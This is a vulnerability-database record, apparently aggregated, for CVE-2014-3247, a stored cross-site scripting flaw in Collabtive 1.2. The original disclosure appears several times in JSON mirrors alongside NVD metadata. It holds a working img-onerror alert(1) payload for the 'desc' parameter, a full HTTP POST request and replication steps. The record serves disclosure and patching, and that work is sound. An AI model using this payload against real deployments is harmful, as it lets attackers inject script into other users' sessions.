ID EXPLOITPACK:0BF7523B53EB5CAFCE83D2753087F3FB Type exploitpack Reporter Deepak Rathore Modified 2014-05-08T00:00:00
Description
Collabtive 1.2 - Persistent Cross-Site Scripting
Vulnerability title: Stored XSS vulnerability in Collabtive application
(CVE-2014-3247)
CVE: CVE-2014-3247(coordinated with cve assigning team and vendor)
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/admin.php?action=addpro
Affected Users: Authenticated users
Affected parameter(s): desc
Issue details: The value of the desc request parameter is copied into the
HTML document as plain text between tags. The payload 1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.
This input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in
the application's response. This proof-of-concept attack demonstrates that
it is possible to inject arbitrary JavaScript into the application's
response. The proof-of-concept attack demonstrated uses an event handler to
introduce arbitrary JavaScript into the document.
HTTP request:
POST /collabtive-12/admin.php?action=addpro HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/collabtive-12/index.php?mode=login
Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
name=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1
Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc
5. Replace "desc" parameter value with "1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6"
6. Forward manipulated request to server and wait for response in browser
7. A popup with alert message will come that is the proof of vulnerability.
Tools used: Burp Suite proxy, Mozilla Firefox browser
Best Regards,
Deepak
{"lastseen": "2020-04-01T19:04:09", "references": [], "description": "\nCollabtive 1.2 - Persistent Cross-Site Scripting", "edition": 1, "reporter": "Deepak Rathore", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2014-05-08T00:00:00", "title": "Collabtive 1.2 - Persistent Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3247"]}, {"type": "zdt", "idList": ["1337DAY-ID-22238"]}, {"type": "exploitdb", "idList": ["EDB-ID:33250"]}, {"type": "seebug", "idList": ["SSV:86487"]}], "modified": "2020-04-01T19:04:09", "rev": 2}, "score": {"value": 4.6, "vector": "NONE", "modified": "2020-04-01T19:04:09", "rev": 2}, "vulnersScore": 4.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3247"], "modified": "2014-05-08T00:00:00", "id": "EXPLOITPACK:0BF7523B53EB5CAFCE83D2753087F3FB", "href": "", "viewCount": 1, "sourceData": "Vulnerability title: Stored XSS vulnerability in Collabtive application\n(CVE-2014-3247)\nCVE: CVE-2014-3247(coordinated with cve assigning team and vendor)\nVendor: Collabtive\nProduct: Collabtive (Open Source Project Management Software)\nAffected version: 1.12\nFixed version: 2.0\nReported by: Deepak Rathore\nSeverity: Critical\nURL: http://[domain]/collabtive-12/admin.php?action=addpro\nAffected Users: Authenticated users\nAffected parameter(s): desc\n\nIssue details: The value of the desc request parameter is copied into the\nHTML document as plain text between tags. The payload 1c91c<img%20src%3da\n%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.\nThis input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in\nthe application's response. This proof-of-concept attack demonstrates that\nit is possible to inject arbitrary JavaScript into the application's\nresponse. The proof-of-concept attack demonstrated uses an event handler to\nintroduce arbitrary JavaScript into the document.\n\nHTTP request:\nPOST /collabtive-12/admin.php?action=addpro HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101\nFirefox/28.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://localhost/collabtive-12/index.php?mode=login\nCookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 75\nname=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1\n\nSteps to replicate:\n1. Login into application\n2. Go to \"Desktop\" tab and click on \"Add project\"\n3. Fill the project details in the project form and click on \"Add\" button\n4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc\n5. Replace \"desc\" parameter value with \"1c91c<img%20src%3da\n%20onerror%3dalert(1) >cc245622da6\"\n6. Forward manipulated request to server and wait for response in browser\n7. A popup with alert message will come that is the proof of vulnerability.\n\nTools used: Burp Suite proxy, Mozilla Firefox browser\n\nBest Regards,\nDeepak", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}
{"cve": [{"lastseen": "2020-10-03T12:01:16", "description": "Cross-site scripting (XSS) vulnerability in Collabtive 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the desc parameter in an Add project (addpro) action to admin.php.", "edition": 3, "cvss3": {}, "published": "2014-05-15T14:55:00", "title": "CVE-2014-3247", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3247"], "modified": "2015-08-01T01:38:00", "cpe": ["cpe:/a:o-dyn:collabtive:1.2"], "id": "CVE-2014-3247", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3247", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:o-dyn:collabtive:1.2:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-02T09:33:57", "edition": 2, "description": "Exploit for php platform in category web applications", "published": "2014-05-12T00:00:00", "type": "zdt", "title": "Collabtive 1.2 - Stored XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3247"], "modified": "2014-05-12T00:00:00", "id": "1337DAY-ID-22238", "href": "https://0day.today/exploit/description/22238", "sourceData": "Vulnerability title: Stored XSS vulnerability in Collabtive application\r\n(CVE-2014-3247)\r\nCVE: CVE-2014-3247(coordinated with cve assigning team and vendor)\r\nVendor: Collabtive\r\nProduct: Collabtive (Open Source Project Management Software)\r\nAffected version: 1.12\r\nFixed version: 2.0\r\nReported by: Deepak Rathore\r\nSeverity: Critical\r\nURL: http://[domain]/collabtive-12/admin.php?action=addpro\r\nAffected Users: Authenticated users\r\nAffected parameter(s): desc\r\n \r\nIssue details: The value of the desc request parameter is copied into the\r\nHTML document as plain text between tags. The payload 1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.\r\nThis input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in\r\nthe application's response. This proof-of-concept attack demonstrates that\r\nit is possible to inject arbitrary JavaScript into the application's\r\nresponse. The proof-of-concept attack demonstrated uses an event handler to\r\nintroduce arbitrary JavaScript into the document.\r\n \r\nHTTP request:\r\nPOST /collabtive-12/admin.php?action=addpro HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101\r\nFirefox/28.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/collabtive-12/index.php?mode=login\r\nCookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\nname=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1\r\n \r\nSteps to replicate:\r\n1. Login into application\r\n2. Go to \"Desktop\" tab and click on \"Add project\"\r\n3. Fill the project details in the project form and click on \"Add\" button\r\n4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc\r\n5. Replace \"desc\" parameter value with \"1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6\"\r\n6. Forward manipulated request to server and wait for response in browser\r\n7. A popup with alert message will come that is the proof of vulnerability.\r\n \r\nTools used: Burp Suite proxy, Mozilla Firefox browser\r\n \r\nBest Regards,\r\nDeepak\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22238"}], "exploitdb": [{"lastseen": "2016-02-03T18:48:36", "description": "Collabtive 1.2 - Stored XSS. CVE-2014-3247. Webapps exploit for php platform", "published": "2014-05-08T00:00:00", "type": "exploitdb", "title": "Collabtive 1.2 - Stored XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3247"], "modified": "2014-05-08T00:00:00", "id": "EDB-ID:33250", "href": "https://www.exploit-db.com/exploits/33250/", "sourceData": "Vulnerability title: Stored XSS vulnerability in Collabtive application\r\n(CVE-2014-3247)\r\nCVE: CVE-2014-3247(coordinated with cve assigning team and vendor)\r\nVendor: Collabtive\r\nProduct: Collabtive (Open Source Project Management Software)\r\nAffected version: 1.12\r\nFixed version: 2.0\r\nReported by: Deepak Rathore\r\nSeverity: Critical\r\nURL: http://[domain]/collabtive-12/admin.php?action=addpro\r\nAffected Users: Authenticated users\r\nAffected parameter(s): desc\r\n\r\nIssue details: The value of the desc request parameter is copied into the\r\nHTML document as plain text between tags. The payload 1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.\r\nThis input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in\r\nthe application's response. This proof-of-concept attack demonstrates that\r\nit is possible to inject arbitrary JavaScript into the application's\r\nresponse. The proof-of-concept attack demonstrated uses an event handler to\r\nintroduce arbitrary JavaScript into the document.\r\n\r\nHTTP request:\r\nPOST /collabtive-12/admin.php?action=addpro HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101\r\nFirefox/28.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/collabtive-12/index.php?mode=login\r\nCookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\nname=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1\r\n\r\nSteps to replicate:\r\n1. Login into application\r\n2. Go to \"Desktop\" tab and click on \"Add project\"\r\n3. Fill the project details in the project form and click on \"Add\" button\r\n4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc\r\n5. Replace \"desc\" parameter value with \"1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6\"\r\n6. Forward manipulated request to server and wait for response in browser\r\n7. A popup with alert message will come that is the proof of vulnerability.\r\n\r\nTools used: Burp Suite proxy, Mozilla Firefox browser\r\n\r\nBest Regards,\r\nDeepak\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33250/"}], "seebug": [{"lastseen": "2017-11-19T16:49:42", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Collabtive 1.2 - Stored XSS", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3247"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86487", "id": "SSV:86487", "sourceData": "\n Vulnerability title: Stored XSS vulnerability in Collabtive application\r\n(CVE-2014-3247)\r\nCVE: CVE-2014-3247(coordinated with cve assigning team and vendor)\r\nVendor: Collabtive\r\nProduct: Collabtive (Open Source Project Management Software)\r\nAffected version: 1.12\r\nFixed version: 2.0\r\nReported by: Deepak Rathore\r\nSeverity: Critical\r\nURL: http://[domain]/collabtive-12/admin.php?action=addpro\r\nAffected Users: Authenticated users\r\nAffected parameter(s): desc\r\n\r\nIssue details: The value of the desc request parameter is copied into the\r\nHTML document as plain text between tags. The payload 1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.\r\nThis input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in\r\nthe application's response. This proof-of-concept attack demonstrates that\r\nit is possible to inject arbitrary JavaScript into the application's\r\nresponse. The proof-of-concept attack demonstrated uses an event handler to\r\nintroduce arbitrary JavaScript into the document.\r\n\r\nHTTP request:\r\nPOST /collabtive-12/admin.php?action=addpro HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101\r\nFirefox/28.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/collabtive-12/index.php?mode=login\r\nCookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\nname=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1\r\n\r\nSteps to replicate:\r\n1. Login into application\r\n2. Go to "Desktop" tab and click on "Add project"\r\n3. Fill the project details in the project form and click on "Add" button\r\n4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc\r\n5. Replace "desc" parameter value with "1c91c<img%20src%3da\r\n%20onerror%3dalert(1) >cc245622da6"\r\n6. Forward manipulated request to server and wait for response in browser\r\n7. A popup with alert message will come that is the proof of vulnerability.\r\n\r\nTools used: Burp Suite proxy, Mozilla Firefox browser\r\n\r\nBest Regards,\r\nDeepak\r\n\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86487"}]}